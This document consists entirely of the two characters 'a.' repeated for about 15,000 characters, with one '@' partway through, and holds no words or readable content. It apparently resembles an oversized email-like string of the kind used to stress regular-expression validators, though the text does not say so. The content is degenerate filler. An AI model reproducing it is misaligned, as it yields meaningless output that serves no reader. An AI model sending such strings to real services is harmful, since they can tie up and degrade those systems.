a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a@a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.